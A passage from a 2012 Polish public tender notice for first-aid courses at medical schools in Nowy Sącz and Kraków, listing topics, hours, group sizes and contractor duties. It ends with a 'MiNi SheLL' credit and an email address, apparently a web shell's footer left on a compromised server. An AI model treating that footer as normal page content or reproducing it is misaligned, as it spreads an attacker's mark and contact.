c.	automatyczny defibrylator zewnętrzny (około 1 godz.), 
d.	stany nagłe - drgawki, atak padaczki, cukrzyca, zawał mięśnia sercowego, zatrucia, tonięcie, ukąszenie przez żmiję, porażenie prądem, hipotermia i hipertermia (około 2 godz.), 
e.	urazy mechaniczne i obrażenia - złamania, zwichnięcia, skręcenia, krwotoki, krwawienia (około 2 godz.), 
f.	podstawy taktyki działań ratowniczych -zdarzenia masowe, mnogie, jednostkowe. Ewakuacja ze strefy zagrożenia (około                  1 godz.

Część praktyczna:
a.	pozycja boczna ustalona (około 1 godz.), 
b.	zadławienia - ciało obce w drogach oddechowych (około 1 godz.), 
c.	BLS  u dorosłych i dzieci (około 5 godz.), 
d.	automatyczny defibrylator zewnętrzny (około 2 godz.), 
e.	stany nagłe - drgawki, atak padaczki, cukrzyca, zawał mięśnia sercowego, zatrucia, tonięcie, ukąszenie przez żmiję, porażenie prądem, hipotermia i hipertermia(około 4 godz.), 
f.	urazy mechaniczne i obrażenia - złamania, zwichnięcia, skręcenia, krwotoki (około 4 godz.), 
g.	taktyka działań ratowniczych -zdarzenia masowe, mnogie, jednostkowe, ewakuacja ze strefy zagrożenia (około 3 godz.).

Czas trwania kursu:. łącznie 90 godzin w tym dla jednej grupy 10 godzin teoretycznych i 20 godzin praktycznych, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie godzinę dydaktyczną tj. 45 min. Czas trwania zajęć maksymalnie 5 godzin dziennie. Przewiduje się  5 minutową przerwę po każdej godzinie dydaktycznej (mogą być w tygodniu lub w weekendy)
Liczba uczestników kursu: łącznie 24 uczniów i uczennic (I grupa - 8 osób, II grupa - 8 osób, III grupa - 8 osób) ze Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu. 
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.
Czas realizacji: od  października  do 17 grudnia  2012 roku:
a. I grupa - październik, 
b. II grupa - listopad, 
c. III grupa - grudzień.
Zamawiający zaleca, aby kurs planowany był w dni powszednie w czasie wolnym od nauki szkolnej lub w weekendy

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego- Liderem Szkolnym po podpisaniu umowy.
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. Umowa będzie realizowana w Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu Zamawiający udostępnia bezpłatnie sale wykładowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu pierwszej pomocy w Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krakowska Medyczna Szkoła Policealna Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków

Przedmiotem tej części postępowania jest zorganizowanie kursu pierwszej pomocy dla uczniów kształcących się w zawodzie higienistka stomatologiczna w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.


Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:


Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji kursu (wykładowców zajęć praktycznych             i trenerów zajęć ćwiczeniowych), koszt wyposażenia specjalistycznego koniecznego do przeprowadzenia ww. kursu, tj. manekiny osób dorosłych, manekin dziecka, urządzenia AED z opcją ćwiczebną, środki opatrunkowe, środki do dezynfekcji, maseczki ochronne, rękawiczki medyczne jednorazowe potrzebne do realizacji szkolenia, koszt materiałów szkoleniowych dla każdego uczestnika kursu. 

Obowiązki Wykonawcy.

Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie dostępu do odpowiedniego sprzętu (pkt. 3.2.3.3) oraz materiałów dydaktycznych takich jak: skrypty, notatniki, długopisy przechodzące na własność kursantów; wyposażenie sali wykładowej (rzutnik, laptop, itp.),
b.	realizacja kursu przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową. 
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.

Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
e.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
f.	program kursu oraz dziennik zajęć,
g.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
h.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem



Ramowy program kursu: program szkolenia musi obejmować 8 godzin teoretyczno - praktycznych dla każdego uczestnika.

Kurs musi się odbywać w oparciu o opracowany przez prowadzącego PROGRAM KURSU, załączony do oferty, OBEJMUJĄCY MIĘDZY INNYMI NIŻEJ WYMIENIONE ZAGADNIENIA:

Część teoretyczna:
a.	Usystematyzowanie zagrożeń panujących w gabinecie stomatologicznym,
b.	Wykorzystanie fotela dentystycznego w ramach postępowania z pacjentem nieprzytomnym, 
c.	Postępowanie w różnych rodzajach wstrząsów ze szczególnym uwzględnieniem zagrożeń w gabinecie stomatologicznym
d.	Pierwsza pomoc w krwawieniach i krwotokach ze szczególnym uwzględnieniem urazów, które mogą powstać w trakcie zabiegów stomatologicznych,
e.	Postępowanie w urazach głowy (szczególnie twarzoczaszki), Ewakuacja z miejsca zdarzenia - sposoby przeniesienie pacjenta z fotela dentystycznego,
f.	Kompletowanie apteczki pierwszej pomocy dla gabinetu stomatologicznego,
g.	Planowanie akcji.
        
Część praktyczna:

Ćwiczenia udzielania pomocy w symulowanych zdarzeniach na terenie gabinetu stomatologicznego.

Czas trwania kursu:  8 godzin teoretyczno-praktycznych (przez 1 godz. rozumiemy godz. lekcyjną 45 minut ).
Liczba uczestników kursu: jedna grupa 10 osobowa. Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy
Czas realizacji: 31 października 2012 r.
Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. Umowa będzie realizowana w Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58. Zamawiający udostępnia bezpłatnie sale wykładowe oraz gabinet stomatologiczny w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com